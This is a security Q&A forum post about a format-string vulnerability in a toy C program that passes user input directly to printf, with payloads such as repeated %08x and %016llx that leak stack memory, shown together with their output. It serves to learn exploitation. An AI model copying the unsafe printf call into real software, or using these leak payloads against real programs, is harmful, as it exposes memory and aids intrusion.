# Incomplete Data In Format String Dump

Tags: vulnerability, memory, format-string

I've been practicing format-string attacks lately and I thought I knew how it works but after hours of research I did not manage to get the expected results.

I made a sample program which has a filled buffer and a format-string exploitable buffer:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buf[50] = { 0 };

    memset(&buf[0], 'A', 49);
    printf("Data: '%s'\n", &buf[0]);
    printf(argv[1]);
    return 0;
}
```

`gcc a.c -fno-stack-protector`

For some reason, when executing it with the format-string exploit I happen to retrieve only 25 `A` instead of the total of 49 filled thanks to the `memset` call.

```
$ ./a.out "`python -c 'print "%08x " * 30'`"
Data: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
00000002 17d37780 7fffffc7 00000000 0000003a ca18d548 00000000 41414141 41414141 41414141 41414141 41414141 41414141 ca180041 0d423100 00400680 17991830 00000000 ca18d548 17f60ca0 004005d6 00000000 c642cb54 004004e0 ca18d540 00000000 00000000 63a2cb54 e492cb54 00000000
```

Furthermore, I've been trying to retrieve the `A` individually by going character by character, but it appears to fail after a certain amount:

```
$ ./a.out "`python -c 'print "%08x " * 7 + "%c" * 25'`"
Data: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
00000002 225e2780 7fffffc7 00000000 0000003a 5264fb08 00000000 AAAAAAA�������
```

Why does the first command only print roughly half the number of `A`s expected ?
Why does the second command fail to print the `A`s after a certain amount ?

Thanks.

Answer (score 1, accepted):

You're doing it correct, you're just not using the correct string format.  The injected `printf` is reading memory *8* bytes (64 bits) at a time, but you're only printing *4* byte (32 bit) hex dumps.
Try using a "long" version of the hex format instead: `%016llx`:

```
$ ./a.out "`python -c 'print "%016llx\n" * 30'`"
Data: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
0000000000000000
00000000ffffc8e8
000000018013ff20
4141414141414141
4141414141414141
4141414141414141
4141414141414141
4141414141414141
4141414141414141
00000000ffff0041
0000000000000000
0000000000000000
...
```